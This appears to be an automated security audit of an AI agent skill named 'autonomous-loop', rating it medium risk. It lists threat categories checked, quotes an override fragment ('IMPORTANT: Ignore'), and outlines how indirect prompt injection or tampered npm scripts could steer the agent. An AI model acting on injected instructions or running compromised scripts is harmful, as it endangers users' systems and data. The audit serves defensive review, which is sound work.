autonomous-loop

Warn

Audited by Gen Agent Trust Hub on Feb 12, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis

The SKILL.md file describes an 'autonomous-loop' skill designed to iterate through development tasks. The skill itself is well-documented and includes explicit 'Safety Guardrails' such as 'NEVER auto-commit without GREEN from qa-commit', 'NEVER auto-push to remote', and 'NEVER delete files without explicit approval'. These are positive indicators of security awareness.

Threat Category Analysis:

  1. Prompt Injection: No direct prompt injection patterns (e.g., 'IMPORTANT: Ignore', 'jailbreak') were found within the skill's instructions or metadata.

  2. Data Exfiltration: The skill does not contain explicit instructions to read sensitive files (e.g., ~/.aws/credentials, ~/.ssh/id_rsa) and exfiltrate them over a network. While it uses tools like Read, Grep, and SemanticSearch which can access file content, and Shell which can perform network operations, there is no direct instruction to combine these for exfiltration within this skill's definition.

  3. Obfuscation: No obfuscation techniques (Base64, zero-width characters, homoglyphs, URL/hex/HTML encoding) were detected in the skill's markdown content.

  4. Unverifiable Dependencies: The skill composes other internal skills (session-status, pr-review, qa-commit, debug) and uses npm run typecheck, npm run lint. It does not introduce new external package installations (e.g., npm install new-package) or fetch scripts from untrusted external URLs. The risk associated with npm run commands is tied to the content of the project's package.json scripts, which is external to this skill's direct instructions.

  5. Privilege Escalation: No commands indicative of privilege escalation (e.g., sudo, chmod +x, chmod 777, service installation) were found.

  6. Persistence Mechanisms: No instructions to establish persistence (e.g., modifying .bashrc, crontab, authorized_keys) were detected.

  7. Metadata Poisoning: The skill's name, description, and parameters are benign and do not contain hidden malicious instructions.

  8. Indirect Prompt Injection: The skill processes 'current task action' and 'commit plan' and invokes other skills (pr-review, qa-commit, debug). If these inputs or the invoked skills contain malicious instructions, they could indirectly influence the agent's behavior. This is an inherent risk for agents processing dynamic or external content.

  9. Time-Delayed / Conditional Attacks: No explicit time-delayed or conditional attack triggers (e.g., date/time checks, usage counters) were identified.

Command Execution: The skill explicitly uses the Shell tool to execute npm run typecheck and npm run lint. While these are specific, common development commands, the Shell tool itself allows for command execution. If the package.json scripts for typecheck or lint were maliciously altered in the project, this skill would execute those malicious commands. This constitutes a COMMAND_EXECUTION risk, albeit mitigated by the specific, non-arbitrary nature of the commands and the presence of safety guardrails.

Conclusion: The most significant direct risk from this skill's instructions is the COMMAND_EXECUTION capability via the Shell tool, which could execute compromised npm scripts. This is rated as MEDIUM. The risk of indirect prompt injection is also noted due to the skill's nature of processing external content and composing other skills.

Audit Metadata
Risk Level
MEDIUM
Analyzed
Feb 12, 2026, 02:19 PM